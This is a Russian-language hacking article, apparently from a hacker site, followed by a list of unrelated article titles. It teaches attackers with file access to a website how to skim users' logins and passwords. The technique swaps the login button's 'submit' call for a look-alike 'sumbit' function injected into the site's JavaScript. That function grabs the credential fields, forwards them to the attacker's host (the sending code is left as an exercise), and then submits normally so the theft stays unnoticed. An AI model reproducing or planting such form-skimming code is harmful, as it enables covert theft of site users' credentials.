Статьи
Хэш нам не преграда, потому что нам его не надо!
Вот на днях пришла мысля в голову, по поводу: запарился брутить хэши с сайтов=), думаю зачем брутить, если кроме доступа к бд, есть доступ к файлам нашей "target". Суть заключается в следующем--файлы php, итп открываются для редактирования, да и попадаются на глаза в наглядном виде чаще, чем js, а на js можно многое ...
PS: Многие не знают того, что описано в этой теме да и я не встречал, поэтому решил отпостить)), многим поможет)
Допустим у нас есть следующий php файл:
<?php
$html='
<html>
<head>
<script type="text/javascript" src="js/script.js"></script>
</head>
<body>
<form id=login-form action=http://localhost/xampp/test2.php method=POST>
<input type=text name=user value="">
<input type=password name=pass>
<input type=button value="Войти" onclick="document.getElementById(\'login-form\').submit()">
</form>
</body></html>';
if ((isset($_POST['user'])) && (isset($_POST['pass']))){
if ((''!=($_POST['user'])) && (''!=($_POST['pass'])))
{
echo "Ваш логин ".$_POST['user']."</br> Хэш пароля ".md5($_POST['pass']);
}
elseif (isset($_POST['user']) & isset($_POST['pass'])) {echo "Вы ввели не все данные";
echo $html;
}
else echo $html;} else echo $html;
?>
Давай подумаем, как украсть без палива логин и пасс?)
Ну давай для начала подумаем, нам ведь нужно отловить пасс при нажатии кнопки "Войти"...
Тогда обратим внимание на строку <input type=button value="Войти"
onclick="document.getElementById(\'login-form\').submit()">
Для обеспечения "безпалева" заменим "submit" на "sumbit", теперь откроем файл
<script type="text/javascript" src="js/script.js"></script>
И обявим там функцию sumbit(), в js доступ к форме можно получить разными способами(да и к любому обекту) разными методами, но у нас в форме уже указан параметр id, поэтому, для безпалевности мы будем его использовать, с помощью функции
document.getElementById()
Итак, начинаем писать нашу волшебную функцию...
function sumbit()
{
t_form=document.getElementById("login-form");
t_user=t_form.user.value;//user между t_form и value -- то, что написано в параметре name="" в input'e формы))
t_pass=t_form.pass.value;// тут аналогично))
//тут пишем код, который отправит t_user и t_pass к вам на хост post или get запросом =).
//как его отправить--ваша проблема, я просто навел на мысль, если ты конечно не знал об это методе %))
document.getElementById("login-form").submit(); //не нарушаем работоспособность сайтенга, иначе нас пропалят :D
}
Ну вот и готово =).
Надеюсь ты не будешь использовать точь-в-точь мою "статью", имхо она не заработает , почитай про js и тогда ты сделаешь сам рабочий вариант, и увидешь, где я допустил ошибку xD, дам подсказку - <input type=button value="Войти" onclick="document.getElementById(\'login-form\').submit()"> вот тут не все так просто...
Спасибо Mr.Mozg за статью.
Новый контент
Hostname lookup своими руками! читать
Хэш нам не преграда, потому что нам его не надо! читать
Startup Delayer 3.0.319: управление автозагрузкой приложений читать
Чертовски хороший LAMP: Пошаговое руководство по установке стека (L)AMP на FreeBSD читать
Tweak-7 1.0.1125: твикер для Windows 7 или как оптимизировать работу Windows 7 читать
Linux и 3G модем. Определение, настройка для подключения к сети. читать
Cистема шифрования TrueCrypt читать
Многопользовательский чат на BAT читать
Исследование: администраторы баз данных мало заботятся о безопасности читать
Оффлайновый способ хранить пароль читать
Спам — как средство передачи шифровок? читать
Мониторинг жёстких дисков при помощи SMART читать
Повышение производительности netfilter, использование ipset читать
Дело об отказавшей системе читать
Атаки на домен: завладеваем корпоративной сетью читать